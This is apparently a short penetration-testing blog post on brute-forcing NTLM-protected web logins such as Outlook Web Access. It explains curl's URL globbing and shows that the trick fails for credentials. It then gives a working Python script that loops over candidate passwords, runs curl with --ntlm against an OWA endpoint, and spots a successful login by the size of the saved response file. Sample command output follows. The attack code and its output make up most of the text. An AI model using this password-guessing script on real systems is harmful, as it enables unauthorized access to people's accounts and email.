NTLM Authentication is related by name only to the Microsoft NTLM hashes.
Try to think of NTLM HTTP Authentication as the Integrated Windows Authentication security feature
Tools used to brute-force hashes, may not be applicable to the NTLM HTTP Authentication.
Burp for example cannot brute force NTLM authentication.
Two of the tools which can be used to brute forcing of NTLM Authentication are
– curl
– wget
Curl
Curl can do NTLM Authentication. In addition, a neat feature of curl is that you can specify a list of characters to want iterated over and replaced. For example:
curl -o test_#1_#2 “http: //www.superconfigure.com/{admin,upload,images}[0-2]”
will retrieve all nine paths:
http ://www.superconfigure.com/admin/0
http ://www.superconfigure.com/upload/0
http ://www.superconfigure.com/images/0
and so on, and save a local file with the HTML as test_admin_0, test_admin_1, etc..for each of the nine results.
To specify NTLM authentication, specify –ntlm and specify the user with -u user:password
curl --html -u superconfigure.com\mario:passphrase https://admin.superconfigure.com
Unfortunately, you can’t use the same syntax for the -u parameter as you can with the URL, so brute-forcing in the following way is not possible.
curl -o test_#1 --ntlm -u superconfigure.com\mario:passw[0-3]rd https ://www.superconfigure.com/emails
internal error: invalid pattern type (0)
Warning: bad output glob!
One way for us to leverage the curl NTLM Authentication capability and brute-force passwords as well is to script it using Python. You obviously want to do this when you KNOW the username and perhaps part of password as well since this is not fast since Python loads curl.
Python script
import os
pwdprefix="mario"
pwdsmiddle=['a','s','d', 'A','S','D']
pwdsuffix=['1','!','#']
cmdprefix="curl -k --ntlm -u \"\SUPERCONFIGURE.COM\mario:"
cmdsuffix="\" https: //email.superconfigure.com/owa/"
for s in pwdsuffix:
for m1 in pwdsmiddle:
pwdattempt=pwdprefix+m1+s
print cmdprefix+pwdattempt+cmdsuffix+" -o "+pwdattempt+".html"
os.system(cmdprefix+pwdattempt+cmdsuffix+" -o "+pwdattempt+".html")
This will save each attempted password as a HTML file, a successful login wil result in a larger file size.
C:\temp\ml>\Python25\python.exe mc.py
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marioa1" https ://email.superconfigure.com/owa/ -o marioa1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marios1" https ://email.superconfigure.com/owa/ -o marios1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:mariod1" https ://email.superconfigure.com/owa/ -o mariod1.html
curl -k --ntlm -u "\SUPERCONFIGURE.COM\mario:marioA1" https ://email.superconfigure.com/owa/ -o marioA1.html